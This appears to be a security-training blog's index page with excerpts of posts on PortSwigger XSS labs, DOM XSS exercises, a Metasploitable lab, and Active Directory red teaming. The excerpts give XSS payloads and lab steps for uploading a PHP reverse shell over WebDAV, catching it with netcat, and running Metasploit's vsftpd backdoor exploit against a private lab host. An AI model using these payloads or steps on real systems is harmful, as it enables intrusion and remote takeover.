Posts

Lab 2: Stored XSS into HTML context with nothing encoded

✅ Summary of the Lab (Conceptual, Safe) The referenced PortSwigger lab demonstrates a stored (persistent) Cross-Site Scripting (XSS) vulnerability in an HTML context where no characters are encoded, meaning user input is placed directly into the page. What the lab tries to teach Stored XSS occurs when malicious input is saved by the application (e.g., in a comment, profile, or post). When other users view that page, the malicious JavaScript runs in their browser. Lack of HTML encoding/escaping makes this possible. Proper output encoding and input handling prevent it. Analogy (Simple Example) Imagine a guestbook in a hotel lobby. Anyone can write a message. The hotel displays messages exactly as written. If a guest writes: “Hello World!” …it shows normally. But if someone writes: “Whenever someone reads this, switch off the lobby lights.” …and the hotel staff blindly obeys whatever the message says, the entire lobby would react. That’s similar to stored XSS: the system treats user i...

Lab 1: Reflected XSS into HTML context with nothing encoded

✅ 1. What the Lab Is About (Simple Summary) This PortSwigger lab demonstrates reflected Cross-Site Scripting (XSS) in a page where: The server takes user input from the URL. The page injects that input directly into HTML. Nothing is encoded or sanitized. Because of that, an attacker can craft a link that makes the browser run unintended JavaScript. The lab goal: ➡️ Inject a harmless script payload to show an alert. 🧠 2. Analogy: “The Classroom Announcer” Imagine a teacher who reads out all messages handed to them, exactly as written, without checking. If a student writes: “Today’s homework is canceled!” …the teacher reads it out loud, even though it wasn’t real. This lab is the same idea: The website takes whatever the user writes (in the URL) and announces it inside the page without checking. If someone adds: `"><script>alert('XSS')</script>` …then the “teacher” (browser) reads it out loud and executes it. 🔍 3. How ...

XSS Exploitation

Exe 1: DOM XSS in document.write sink using source location.search Enter a random alphanumeric string into the search box. Right-click and inspect the element, and observe that your random string has been placed inside an img src attribute. Break out of the img attribute by searching for: `"><svg onload=alert(1)>` Payload: `"><svg onload=alert(1)>` Exe 2: DOM XSS in innerHTML sink using source location.search Enter the following into the search box: `<img src=1 onerror=alert(1)>` Click ...

Lab Key Notes - AD Red Team

Attacker Machine (192.168.50.2) - Victim Machine (Metasploitable) (192.168.50.3) Perform at Attacker Machine: nc 192.168.50.3 80 --> Victim Machine OPTIONS http://192.168.50.3 host:192.168.50.3 OPTIONS http://192.168.50.3/dav/ HTTP/1.0 host:192.168.50.3 Upload php Web Shell: cadaver http://192.168.50.3/dav/ ls /usr/share/webshells/php/ nano /usr/share/webshells/php/php-reverse-shell.php change to ip: attacker machine (192.168.50.2) port: 1234 Upload shell: put /usr/share/webshells/php/php-reverse-shell.php Get Reverse Shell: nc -nlvp 1234 Basic Commands: $ ifconfig $ /sbin/ifconfig Tool: MSFConsole $ msfconsole $ search vsftpd $ found ==> exploit/unix/ftp/vsftpd_234_backdoor $ use exploit/unix/ftp/vsftpd_234_backdoor $ show options $ set RHOSTS 192.168.50.3 (Victim Machine) $ set verbose true $ run Get the command shell: whoami It launches a real bash shell through Python by attaching it to a pseudo-terminal, improving interactivity compared to just running /bin/b...

Active Directory - Red Teaming - Part 1

What is Red Teaming? Red teaming in Active Directory is the process of simulating real-world cyberattacks to identify weaknesses in an organization’s AD environment. It focuses on gaining initial access, escalating privileges, and moving laterally to reveal security gaps before real attackers exploit them. Red Teams are divided into 3 Groups Red teams are typically divided into three groups: Cyber, which tests digital defenses through hacking simulations (e.g., network penetration, AD attacks); Social, which exploits human behavior using tactics like phishing or impersonation; and Physical, which attempts to bypass physical security by tailgating, lockpicking, or accessing restricted areas. Red Team Emulation Emulates (copies) the behavior of a specific real-world threat group, including their tools, techniques, and attack patterns. Example: Acting exactly like APT29, using the same phishing style, malware families, and stealthy lateral movement they are known for. Goal: Test how we...